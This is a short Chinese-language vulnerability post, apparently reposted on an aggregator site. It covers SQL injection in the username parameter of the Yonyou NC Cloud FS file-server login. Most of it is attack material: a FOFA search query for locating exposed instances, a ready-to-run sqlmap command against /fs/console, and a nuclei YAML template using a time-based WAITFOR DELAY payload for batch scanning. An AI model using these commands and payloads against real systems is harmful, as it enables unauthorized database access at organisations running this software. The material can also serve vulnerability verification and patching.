用友NC Cloud FS文件服务器SQL注入 您所在的位置:网站首页 用友icloud 用友NC Cloud FS文件服务器SQL注入

用友NC Cloud FS文件服务器SQL注入

2024-07-02 15:12| 来源: 网络整理| 查看: 265

漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。

漏洞影响

用友NC Cloud且存在FS文件服务器配置管理登录页面。

漏洞复现

fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317" 用友NC Cloud登录页面如下: 在应用中存在文件服务器管理登录页面 http://xxx.xxx.xxx.xxx/fs/ 拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。 sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username

nuclei批量yaml文件 id: yonyou_NCCloud_FS_sqli info: name: 用友 NCCloud FS文件管理SQL注入 author: mczilong severity: critical tags: yonyou description: fofa "NCCloud" requests: - raw: - | @timeout: 15s GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'duration>=8'


【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有